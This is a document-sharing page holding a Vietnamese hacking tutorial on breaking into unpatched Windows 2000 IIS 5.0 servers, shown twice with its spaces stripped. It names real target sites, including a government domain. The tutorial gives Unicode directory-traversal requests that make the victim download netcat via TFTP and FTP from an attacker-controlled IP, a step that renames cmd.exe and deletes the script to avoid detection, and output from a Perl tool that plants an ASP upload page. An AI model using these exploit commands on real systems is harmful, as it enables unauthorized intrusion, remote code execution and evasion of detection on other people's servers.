Kinh nghiệm khi Hack Windows 2000 Server IIS 5.0
Số trang: 2
Loại file: doc
Dung lượng: 34.00 KB
Lượt xem: 17
Lượt tải: 0
Xem trước 2 trang đầu tiên của tài liệu này:
Thông tin tài liệu:
Qua nghiên cứu cách upload/download file trên một số Server khi tìm cách hack website http://www.cantho1260.net/ và http://www.cantho.gov.vn/ sử dụng Windows 2000 Server chưa patch lỗi thì tôi nhận thấy có một số kinh nghiệm sau đây xin viết vài dòng để chia sẻ cùng với anh em và nếu có thiếu xót xin bổ sung cho. Để Upload netcat lên dùng TFTP thì đơn giản, nhưng trước tiên chúng ta phải cài TFTP server trên system (203.162.30.219). Sau đó cho thi hành các lệnh sau đây trên system của Victim bằng cách dùng một số lỗi như System Traversal...
Nội dung trích xuất từ tài liệu:
Kinh nghiệm khi Hack Windows 2000 Server IIS 5.0KinhnghiệmkhiHackWindows2000ServerIIS5.0:trangnàyđãđượcđọc lầnQuanghiêncứucáchupload/downloadfiletrênmộtsốServerkhitìmcáchhackwebsitehttp://www.cantho1260.net/vàhttp://www.cantho.gov.vn/sửdụngWindows2000Serverchưapatchlỗithìtôinhậnthấycómộtsốkinhnghiệmsauđâyxinviếtvàidòngđểchiasẻcùngvớianhemvànếucóthiếuxótxinbổsungcho.ĐểUploadnetcatlêndùngTFTPthìđơngiản,nhưngtrướctiênchúngtaphảicàiTFTPservertrênsystem(203.162.30.219).SauđóchothihànhcáclệnhsauđâytrênsystemcủaVictimbằngcáchdùngmộtsốlỗinhưSystemTraversalcủaUnicodeExploitchẳnghạn:GET/scripts/..%c0%af…/winnt/system32/tftp.exe?”1”+203.162.30.219+GET+nc.exeC: c.exeHTTP/1.0VídụtrênsẽtrỏđếnC:vìđâylàthưmụcmàaicũngcóthểWritevàođượckhôngcóPermitphảilàAdminhaykhông.NếuNetcatđãcósẵnbạnsẽnhậnđượcmộtthôngbáolà“tftp.exe:can’twritetoC: c.exe”,nhưngnếuthànhcôngthìBrowsersẽtrảvềlỗi“HTTP502GatewayError”vàmộtMessagelà:“Transfersuccessful:59392byteinxsecond,59392bytes/3s.”DùngFTPthìhơinhọccônghơnvìphảiquamộttrunggian,hãytạomộtfiletêngìcũngđượctrênmáyVictimđểdùngFTPscriptvớicommandlà–s:[filename]sauđóScriptsẽgiúpchoFTPClienconnectđếnmáychúngtađểdownloadnetcatvềlocalcủaHost.Trướckhitạofilenàychúngtachắcchắnlàsẽbịcảntrở.Vàđểvượtquathìcómộtmẹonhỏlàhãycopyđổitênfilecmd.exethànhmộttênkháctrướcđã.GET/scripts/..%c0%af.../winnt/system32/cmd.exe?+/c+copy+c:winntsystem32cmd.exe+c:aclatinh.exeHTTP/1.0OK!Filecmd.exebâygiờđãđượccopysangmộtbảnkháccótênlàaclatinh.exe,bâygiờchúngtalạiphảighivàoC:vìnhưđãnóilàđâylànơimàbấtcứaicũngcóthểwritevào.BâygiờphảitạomộtfileFTPscriptbằngcáchdùnglệnhecho.SauđâylàmộtnộidungcủamộtfileScript,chúngtasẽchọntênfilelàftpaclatinhvàusernamecủaFTPlàanonymous,passwordlàa@a.com,FTPserverlà192.168.2.31.GET/scripts/...%0c%af../aclatinh.exe?+/c+echo+anonymous>C:ftpaclatinh&&echo+a@a.com>C:ftpaclatinh&echo+bin>>C:ftpaclatinh&&echo+get+test.txt+C: c.exe>>C:ftpaclatinh&&echo+Bye>>C:ftpaclatinh&&ftp+s:C:ftpaclatinh+192.168.234.31&&del+C:ftpaclatinhOK!SaukhithựchiệnscripttrênnósẽcopynetcatđếnC: rênServervàxóaluônfilescriptftpaclatinhđểtránhbịpháthiện.Nhưnglưuýlàtừdòngthứ2phảidùng“>>”đểbốsungthêmvàoftpaclatinhchứkhôngphảilà“>”._Tạofilebằnglệnhecho:DĩnhiênlànếuFTPvàTFTPkhôngcósẵn,trườnghợpnàychỉxảyrađốivớimộtsốadmincótính“tàotháo”haybịBlockbởifirewallchẳnghạnthìchúngtaphảidùnglệnhEchođểgõtừngdònglệnhvàovídụnhưlànộidungcủafilecmd.aspchẳnghạnthìcáchlàmnhưsau:đểtạofilethìgõvào“echonộidung>c: enfile&vol”vàđểthêmnộidungvàofiletrênthìgõvào:echonộidung>>c: enfile&volvàcứthếtuylâunhưngcònhơnkhônglàmđượcgì.VàmộthackercótênlàRelofTemminghcũngcóviếtsẵnmộtScritpchoUnicodeExploitdướidạngngônngữPerlcótênlà“cgidecodeloader.pl”cũngdùngcáchechovàgiántiếpđểtạora2filelàupload.aspvàupload.incchophépuploaddựatrênBrowserthuậntiện(vàôngtacũngcóviếtmộtScriptlà“unicodeexcute.pl”chophéphackerthihànhlệnhtừxa).Dùngunicodeloder.plthìtrướctiênphảichắcchắnlàhaifileupload.aspvàupload.incphảicócùngtrongthưmụcchứafileunicodeloader.plvàcầnxácđịnhthưmụcnàocủaServerchophépWritablevàexcutableđãthườngthìnólàC:intetpubscripts,làdefaultkhiinstallWindows2000.C:>Perlunicodeloader.plUsage:unicodeloaderIP:portwebrootC:>Perlunicodeloader.plcantho1260.net:80C:inetpubscriptsCreatinguploadingwebpageonvictim.comonport80.ThewebrootisC:inetpubscripts.testingdirectory/scripts/..%c0%af../winnt/system32/cmd.exe?/cfarmerbrowndirectory:c:inetpubscriptsauisnotrecognizedasaninternalorexternalcommand,operableprogramorbatchfile.sensepost.exefoundonsystemuploadingASPsection:..............uploadingtheINCsection:(thismaytakeawhile).................................................................................uploadpagecreated.Nowsimplysurftocaesars/upload.aspandenjoy.FileswillbeuploadedtoC:inetpubscriptsVàchúngtahãykhảoxáccáchnólàmviệc.Trướctiênnósẽcopycmd.exethànhmộtfilecótênlà“sensepost.exe”đếnthưmụcđãxácđịnhlàWebroot,ởđâylàC:Intetpubscriptssauđónóbypassquacmd.exegiántiếp(“>”)quaexploit.vàsensepost.exeđượcdùngđểechovàgiántiếp2fileupload.aspvaupload.inctừngdòngmãmộttronghaifileđểvàothưmụcWroot(ởđâylàC:Inetpubscr ...
Nội dung trích xuất từ tài liệu:
Kinh nghiệm khi Hack Windows 2000 Server IIS 5.0KinhnghiệmkhiHackWindows2000ServerIIS5.0:trangnàyđãđượcđọc lầnQuanghiêncứucáchupload/downloadfiletrênmộtsốServerkhitìmcáchhackwebsitehttp://www.cantho1260.net/vàhttp://www.cantho.gov.vn/sửdụngWindows2000Serverchưapatchlỗithìtôinhậnthấycómộtsốkinhnghiệmsauđâyxinviếtvàidòngđểchiasẻcùngvớianhemvànếucóthiếuxótxinbổsungcho.ĐểUploadnetcatlêndùngTFTPthìđơngiản,nhưngtrướctiênchúngtaphảicàiTFTPservertrênsystem(203.162.30.219).SauđóchothihànhcáclệnhsauđâytrênsystemcủaVictimbằngcáchdùngmộtsốlỗinhưSystemTraversalcủaUnicodeExploitchẳnghạn:GET/scripts/..%c0%af…/winnt/system32/tftp.exe?”1”+203.162.30.219+GET+nc.exeC: c.exeHTTP/1.0VídụtrênsẽtrỏđếnC:vìđâylàthưmụcmàaicũngcóthểWritevàođượckhôngcóPermitphảilàAdminhaykhông.NếuNetcatđãcósẵnbạnsẽnhậnđượcmộtthôngbáolà“tftp.exe:can’twritetoC: c.exe”,nhưngnếuthànhcôngthìBrowsersẽtrảvềlỗi“HTTP502GatewayError”vàmộtMessagelà:“Transfersuccessful:59392byteinxsecond,59392bytes/3s.”DùngFTPthìhơinhọccônghơnvìphảiquamộttrunggian,hãytạomộtfiletêngìcũngđượctrênmáyVictimđểdùngFTPscriptvớicommandlà–s:[filename]sauđóScriptsẽgiúpchoFTPClienconnectđếnmáychúngtađểdownloadnetcatvềlocalcủaHost.Trướckhitạofilenàychúngtachắcchắnlàsẽbịcảntrở.Vàđểvượtquathìcómộtmẹonhỏlàhãycopyđổitênfilecmd.exethànhmộttênkháctrướcđã.GET/scripts/..%c0%af.../winnt/system32/cmd.exe?+/c+copy+c:winntsystem32cmd.exe+c:aclatinh.exeHTTP/1.0OK!Filecmd.exebâygiờđãđượccopysangmộtbảnkháccótênlàaclatinh.exe,bâygiờchúngtalạiphảighivàoC:vìnhưđãnóilàđâylànơimàbấtcứaicũngcóthểwritevào.BâygiờphảitạomộtfileFTPscriptbằngcáchdùnglệnhecho.SauđâylàmộtnộidungcủamộtfileScript,chúngtasẽchọntênfilelàftpaclatinhvàusernamecủaFTPlàanonymous,passwordlàa@a.com,FTPserverlà192.168.2.31.GET/scripts/...%0c%af../aclatinh.exe?+/c+echo+anonymous>C:ftpaclatinh&&echo+a@a.com>C:ftpaclatinh&echo+bin>>C:ftpaclatinh&&echo+get+test.txt+C: c.exe>>C:ftpaclatinh&&echo+Bye>>C:ftpaclatinh&&ftp+s:C:ftpaclatinh+192.168.234.31&&del+C:ftpaclatinhOK!SaukhithựchiệnscripttrênnósẽcopynetcatđếnC: rênServervàxóaluônfilescriptftpaclatinhđểtránhbịpháthiện.Nhưnglưuýlàtừdòngthứ2phảidùng“>>”đểbốsungthêmvàoftpaclatinhchứkhôngphảilà“>”._Tạofilebằnglệnhecho:DĩnhiênlànếuFTPvàTFTPkhôngcósẵn,trườnghợpnàychỉxảyrađốivớimộtsốadmincótính“tàotháo”haybịBlockbởifirewallchẳnghạnthìchúngtaphảidùnglệnhEchođểgõtừngdònglệnhvàovídụnhưlànộidungcủafilecmd.aspchẳnghạnthìcáchlàmnhưsau:đểtạofilethìgõvào“echonộidung>c: enfile&vol”vàđểthêmnộidungvàofiletrênthìgõvào:echonộidung>>c: enfile&volvàcứthếtuylâunhưngcònhơnkhônglàmđượcgì.VàmộthackercótênlàRelofTemminghcũngcóviếtsẵnmộtScritpchoUnicodeExploitdướidạngngônngữPerlcótênlà“cgidecodeloader.pl”cũngdùngcáchechovàgiántiếpđểtạora2filelàupload.aspvàupload.incchophépuploaddựatrênBrowserthuậntiện(vàôngtacũngcóviếtmộtScriptlà“unicodeexcute.pl”chophéphackerthihànhlệnhtừxa).Dùngunicodeloder.plthìtrướctiênphảichắcchắnlàhaifileupload.aspvàupload.incphảicócùngtrongthưmụcchứafileunicodeloader.plvàcầnxácđịnhthưmụcnàocủaServerchophépWritablevàexcutableđãthườngthìnólàC:intetpubscripts,làdefaultkhiinstallWindows2000.C:>Perlunicodeloader.plUsage:unicodeloaderIP:portwebrootC:>Perlunicodeloader.plcantho1260.net:80C:inetpubscriptsCreatinguploadingwebpageonvictim.comonport80.ThewebrootisC:inetpubscripts.testingdirectory/scripts/..%c0%af../winnt/system32/cmd.exe?/cfarmerbrowndirectory:c:inetpubscriptsauisnotrecognizedasaninternalorexternalcommand,operableprogramorbatchfile.sensepost.exefoundonsystemuploadingASPsection:..............uploadingtheINCsection:(thismaytakeawhile).................................................................................uploadpagecreated.Nowsimplysurftocaesars/upload.aspandenjoy.FileswillbeuploadedtoC:inetpubscriptsVàchúngtahãykhảoxáccáchnólàmviệc.Trướctiênnósẽcopycmd.exethànhmộtfilecótênlà“sensepost.exe”đếnthưmụcđãxácđịnhlàWebroot,ởđâylàC:Intetpubscriptssauđónóbypassquacmd.exegiántiếp(“>”)quaexploit.vàsensepost.exeđượcdùngđểechovàgiántiếp2fileupload.aspvaupload.inctừngdòngmãmộttronghaifileđểvàothưmụcWroot(ởđâylàC:Inetpubscr ...
Tìm kiếm theo từ khóa liên quan:
kỹ thuật hack máy tính khắc phục sự cố máy tính cách sửa lỗi máy tính thủ thuật máy tính lỗi máyTài liệu liên quan:
-
Top 10 mẹo 'đơn giản nhưng hữu ích' trong nhiếp ảnh
11 trang 332 0 0 -
Làm việc với Read Only Domain Controllers
20 trang 323 0 0 -
Sửa lỗi các chức năng quan trọng của Win với ReEnable 2.0 Portable Edition
5 trang 227 0 0 -
Phần III: Xử lý sự cố Màn hình xanh
3 trang 222 0 0 -
Phương pháp bảo vệ và khác phục sự cố máy tính: Phần 2
99 trang 219 0 0 -
Tổng hợp 30 lỗi thương gặp cho những bạn mới sử dụng máy tính
9 trang 215 0 0 -
Sao lưu dữ liệu Gmail sử dụng chế độ Offline
8 trang 212 0 0 -
Giáo trình Bảo trì hệ thống và cài đặt phần mềm
68 trang 210 0 0 -
UltraISO chương trình ghi đĩa, tạo ổ đĩa ảo nhỏ gọn
10 trang 205 0 0 -
Hướng dẫn cách khắc phục lỗi màn hình xanh trong windows
7 trang 203 0 0